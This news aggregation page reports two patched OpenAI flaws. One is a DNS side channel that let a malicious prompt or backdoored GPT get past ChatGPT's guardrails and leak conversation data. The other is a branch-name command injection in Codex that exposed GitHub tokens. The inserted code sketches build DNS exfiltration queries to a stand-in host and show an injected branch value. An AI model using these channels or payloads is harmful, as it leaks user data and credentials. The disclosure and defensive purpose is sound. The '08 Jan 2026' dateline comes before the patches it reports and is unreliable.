2 Sources
[1]
OpenAI Patches ChatGPT Data Exfiltration Flaw and Codex GitHub Token Vulnerability
A previously unknown vulnerability in OpenAI ChatGPT allowed sensitive conversation data to be exfiltrated without user knowledge or consent, according to new findings from Check Point. "A single malicious prompt could turn an otherwise ordinary conversation into a covert exfiltration channel, leaking user messages, uploaded files, and other sensitive content," the cybersecurity company said in a report published today. "A backdoored GPT could abuse the same weakness to obtain access to user data without the user's awareness or consent." Following responsible disclosure, OpenAI addressed the issue on February 20, 2026. There is no evidence that the issue was ever exploited in a malicious context.

While ChatGPT is built with various guardrails to prevent unauthorized data sharing and block direct outbound network requests, the newly discovered vulnerability bypasses these safeguards entirely by exploiting a side channel in the Linux runtime used by the artificial intelligence (AI) agent for code execution and data analysis. Specifically, it abuses a hidden DNS-based communication path as a "covert transport mechanism," encoding information into DNS requests to get around visible AI guardrails. What's more, the same hidden communication path could be used to establish remote shell access inside the Linux runtime and achieve command execution.

Because there is no warning or user approval dialog, the vulnerability creates a security blind spot: the AI system assumes the environment is isolated. As an illustrative example, an attacker could convince a user to paste a malicious prompt by passing it off as a way to unlock premium capabilities for free or improve ChatGPT's performance. The threat is magnified when the technique is embedded inside a custom GPT, as the malicious logic can be baked in rather than relying on tricking a user into pasting a specially crafted prompt.
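The general shape of a DNS covert channel can be sketched in a few lines. The Python below is a generic reconstruction of the technique class, not Check Point's proof of concept: data is encoded into DNS-safe labels and prepended to a hypothetical attacker-controlled zone (`exfil.example.com` is an assumption), so that simply resolving each hostname leaks a chunk of data to the attacker's nameserver even when HTTP egress is blocked.

```python
import base64

ATTACKER_DOMAIN = "exfil.example.com"  # hypothetical attacker-controlled zone
CHUNK_LEN = 60  # keeps each label under the 63-byte DNS label limit

def encode_queries(secret: bytes) -> list[str]:
    # Base32 keeps the payload within the DNS hostname character set.
    b32 = base64.b32encode(secret).decode().rstrip("=").lower()
    # Split into chunks and number them so the receiver can reassemble.
    chunks = [b32[i:i + CHUNK_LEN] for i in range(0, len(b32), CHUNK_LEN)]
    return [f"{i}-{chunk}.{ATTACKER_DOMAIN}" for i, chunk in enumerate(chunks)]

queries = encode_queries(b"user uploaded file contents...")
# Each element is a resolvable-looking hostname carrying one data chunk;
# issuing ordinary lookups for them exfiltrates the payload via DNS.
```

Because the traffic is ordinary DNS resolution rather than an outbound HTTP request, guardrails that only police visible network calls never see it.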
"Crucially, because the model operated under the assumption that this environment could not send data outward directly, it did not recognize that behavior as an external data transfer requiring resistance or user mediation," Check Point explained. "As a result, the leakage did not trigger warnings about data leaving the conversation, did not require explicit user confirmation, and remained largely invisible from the user's perspective."

With tools like ChatGPT increasingly embedded in enterprise environments and users uploading highly personal information, vulnerabilities like these underscore the need for organizations to implement their own security layer to counter prompt injections and other unexpected behavior in AI systems.

"This research reinforces a hard truth for the AI era: don't assume AI tools are secure by default," Eli Smadja, head of research at Check Point Research, said in a statement shared with The Hacker News. "As AI platforms evolve into full computing environments handling our most sensitive data, native security controls are no longer sufficient on their own. Organizations need independent visibility and layered protection between themselves and AI vendors. That's how we move forward safely -- by rethinking security architecture for AI, not reacting to the next incident."

The development comes as threat actors have been observed publishing web browser extensions (or updating existing ones) that engage in the dubious practice of prompt poaching to silently siphon AI chatbot conversations without user consent, highlighting how seemingly harmless add-ons could become a channel for data exfiltration. "It almost goes without saying that these plugins open the doors to several risks, including identity theft, targeted phishing campaigns, and sensitive data being put up for sale on underground forums," Expel researcher Ben Nahorney said.
"In the case of organizations where employees may have unwittingly installed these extensions, they may have exposed intellectual property, customer data, or other confidential information."

Command Injection Vulnerability in OpenAI Codex Leads to GitHub Token Compromise

The findings also coincide with the discovery of a critical command injection vulnerability in OpenAI's Codex, a cloud-based software engineering agent, that could have been exploited to steal GitHub credential data and ultimately compromise multiple users interacting with a shared repository. "The vulnerability exists within the task creation HTTP request, which allows an attacker to smuggle arbitrary commands through the GitHub branch name parameter," BeyondTrust Phantom Labs researcher Tyler Jespersen said in a report shared with The Hacker News. "This can result in the theft of a victim's GitHub User Access Token - the same token Codex uses to authenticate with GitHub."

The issue, per BeyondTrust, stems from improper input sanitization when processing GitHub branch names during task execution on the cloud. Because of this inadequacy, an attacker could inject arbitrary commands through the branch name parameter in an HTTPS POST request to the backend Codex API, execute malicious payloads inside the agent's container, and retrieve sensitive authentication tokens. "This granted lateral movement and read/write access to a victim's entire codebase," Kinnaird McQuade, chief security architect at BeyondTrust, said in a post on X. It has been patched by OpenAI as of February 5, 2026, after it was reported on December 16, 2025. The vulnerability affects the ChatGPT website, Codex CLI, Codex SDK, and the Codex IDE Extension.

The cybersecurity vendor said the branch command injection technique could also be extended to steal GitHub Installation Access tokens and execute bash commands on the code review container whenever @codex is referenced in GitHub.
"With the malicious branch set up, we referenced Codex in a comment on a pull request (PR)," it explained. "Codex then initiated a code review container and created a task against our repository and branch, executing our payload and forwarding the response to our external server." The research also highlights a growing risk where the privileged access granted to AI coding agents can be weaponized to provide a "scalable attack path" into enterprise systems without triggering traditional security controls. "As AI agents become more deeply integrated into developer workflows, the security of the containers they run in - and the input they consume - must be treated with the same rigor as any other application security boundary," BeyondTrust said. "The attack surface is expanding, and the security of these environments needs to keep pace."
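The bug class behind this is easy to reproduce in miniature. The sketch below is an assumption-laden stand-in: it uses `echo` in place of Codex's real environment-setup commands, but shows the same failure mode — a branch name formatted into a shell string lets shell metacharacters in the name become a second command.

```python
import subprocess

# Attacker-chosen branch name; the ';' terminates the intended command.
branch = "main; echo INJECTED"

# Vulnerable pattern: user-controlled input interpolated into a shell
# string and run with shell=True, so the shell parses the metacharacters.
result = subprocess.run(
    f"echo cloning branch {branch}",
    shell=True, capture_output=True, text=True,
)
print(result.stdout)
# The shell splits on ';' and executes 'echo INJECTED' as an extra command.
```

In the reported vulnerability the tainted value reached git commands during container setup rather than an `echo`, but any `shell=True`-style interpolation of untrusted input fails the same way.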
[2]
OpenAI Codex vulnerability enabled GitHub token theft via command injection, report finds - SiliconANGLE
A critical vulnerability in OpenAI Group PBC's Codex coding agent could have exposed sensitive GitHub authentication tokens through a command injection flaw, according to a new report out today from Phantom Labs, the research arm of identity and access security company BeyondTrust Corp.

Codex is a coding assistant offered as part of ChatGPT that allows developers to interact directly with code repositories by issuing prompts that trigger automated tasks such as code generation, reviews and pull requests. The tasks run inside managed container environments that clone repositories and authenticate using short-lived GitHub OAuth tokens, creating a useful but sensitive execution layer.

The vulnerability stemmed from the way Codex processes branch names during task creation: manipulating the branch parameter could inject arbitrary shell commands during environment setup, which could then be used to execute code within the container. Testing the vulnerability, the researchers were able to extract the GitHub OAuth token used for repository access and expose it through task outputs or external network requests.

With access to the GitHub OAuth token, an attacker could potentially move laterally within GitHub, particularly in enterprise environments where Codex is granted broad permissions across repositories and workflows. The researchers also demonstrated that the flaw extended beyond the web interface to Codex's command-line interface, software development kit and integrated development environment integrations, where locally stored authentication credentials could be used to reproduce the attack via backend application programming interfaces. If exploited, the vulnerability also could have been scaled.
The researchers found that by embedding malicious payloads directly into GitHub branch names, an attacker with repository access could compromise multiple users interacting with the same project.

The good news is that OpenAI has since addressed the vulnerability through coordinated fixes, including improved input validation, stronger shell escaping protections and tighter controls around token exposure within container environments. The AI giant also put in place additional measures to limit token scope and lifetime during task execution.

"AI coding agents are not just productivity tools. They are live execution environments with access to sensitive credentials and organizational resources," the report concludes. "When user-controllable input is passed unsanitized into shell commands, the result is command injection with real consequences: token theft, organizational compromise and automated exploitation at scale." The report added that "as AI agents become more deeply integrated into developer workflows, the security of the containers they run in -- and the input they consume -- must be treated with the same rigor as any other application security boundary. The attack surface is expanding and the security of these environments needs to keep pace."
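The fixes described — input validation plus stronger shell escaping — correspond to a well-known defensive pattern. A minimal sketch follows, assuming a conservative allow-list regex of my own (not OpenAI's actual rules, and stricter than git's full ref-name grammar, which additionally forbids sequences like `..` and `@{`):

```python
import re

# Allow-list for branch names: must start with an alphanumeric character,
# then alphanumerics, dots, underscores, slashes, and hyphens only.
# This is an illustrative assumption, not OpenAI's validation logic.
SAFE_BRANCH = re.compile(r"[A-Za-z0-9][A-Za-z0-9._/-]*")

def checkout_argv(branch: str) -> list[str]:
    """Build a git command as an argument vector, never a shell string."""
    if not SAFE_BRANCH.fullmatch(branch):
        raise ValueError(f"rejected branch name: {branch!r}")
    # '--' stops option parsing, and passing a list (no shell) means
    # metacharacters are never interpreted even if validation were bypassed.
    return ["git", "checkout", "--", branch]
```

The key design choice is layering: the regex rejects hostile input up front, while the argument-vector execution (e.g. `subprocess.run(checkout_argv(branch))`) ensures that even a validation bypass cannot smuggle shell syntax, because no shell ever parses the value.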
A critical command injection vulnerability in OpenAI's Codex coding agent allowed attackers to steal sensitive GitHub authentication tokens by manipulating branch names. The flaw, discovered by BeyondTrust's Phantom Labs, could have enabled unauthorized access across repositories and scaled attacks targeting multiple developers. OpenAI has since patched the issue with improved input validation and stronger security controls.
A critical command injection vulnerability in OpenAI's Codex coding agent created a pathway for attackers to steal sensitive GitHub authentication tokens, according to findings from Phantom Labs, the research arm of BeyondTrust [2]. The OpenAI Codex vulnerability stemmed from improper input sanitization when processing GitHub branch names during task execution, allowing malicious actors to inject arbitrary shell commands into container environments where code repositories are cloned and authenticated [1].

Codex, offered as part of ChatGPT, enables developers to interact directly with code repositories through prompts that trigger automated tasks like code generation, reviews, and pull requests. These tasks run inside managed container environments that authenticate using short-lived GitHub OAuth tokens. The vulnerability occurred when manipulated branch names during task creation allowed attackers to execute code within these containers and extract the OAuth tokens used for repository access [2].
Source: SiliconANGLE
With access to compromised GitHub OAuth tokens, attackers could potentially move laterally within GitHub, a risk that is particularly dangerous in enterprise environments where Codex is granted broad permissions across repositories and developer workflows [2]. BeyondTrust researcher Tyler Jespersen explained that "the vulnerability exists within the task creation HTTP request, which allows an attacker to smuggle arbitrary commands through the GitHub branch name parameter" [1].

The security flaw extended beyond Codex's web interface to affect its command-line interface, software development kit, and integrated development environment integrations, where locally stored authentication credentials could reproduce the attack via backend application programming interfaces [2]. Researchers demonstrated that by embedding malicious payloads directly into GitHub branch names, an attacker with repository access could compromise multiple users interacting with the same project, enabling scaled attacks across organizations.

OpenAI has addressed the vulnerability through coordinated fixes, including improved input validation, stronger shell escaping protections, and tighter controls around token exposure within container environments [2]. The company also implemented additional measures to limit token scope and lifetime during task execution. There is no evidence the flaw was exploited maliciously before being patched [1].
The discovery coincides with separate findings from Check Point revealing a ChatGPT data exfiltration vulnerability that OpenAI patched on February 20, 2026. That flaw exploited a hidden DNS-based communication path in the Linux runtime to bypass AI guardrails and exfiltrate conversation data without user awareness.

Source: Hacker News
"AI coding agents are not just productivity tools. They are live execution environments with access to sensitive credentials and organizational resources," the Phantom Labs report concludes [2]. The researchers emphasize that as AI agents become more deeply integrated into developer workflows, the security of AI coding agents and the container environments they operate in must be treated with the same rigor as any other application security boundary. The attack surface is expanding as these tools handle increasingly sensitive operations across code repositories and enterprise systems.

For organizations deploying AI coding agents, the vulnerability highlights the need for independent security layers beyond native controls. Cybersecurity experts recommend monitoring for unauthorized access within GitHub, implementing strict input sanitization practices, and maintaining visibility into how AI tools interact with authentication systems and code repositories. As AI guardrails continue to evolve, the security architecture surrounding these platforms requires continuous assessment to prevent data exfiltration and credential compromise at scale.
Summarized by Navi
08 Jan 2026 • Technology
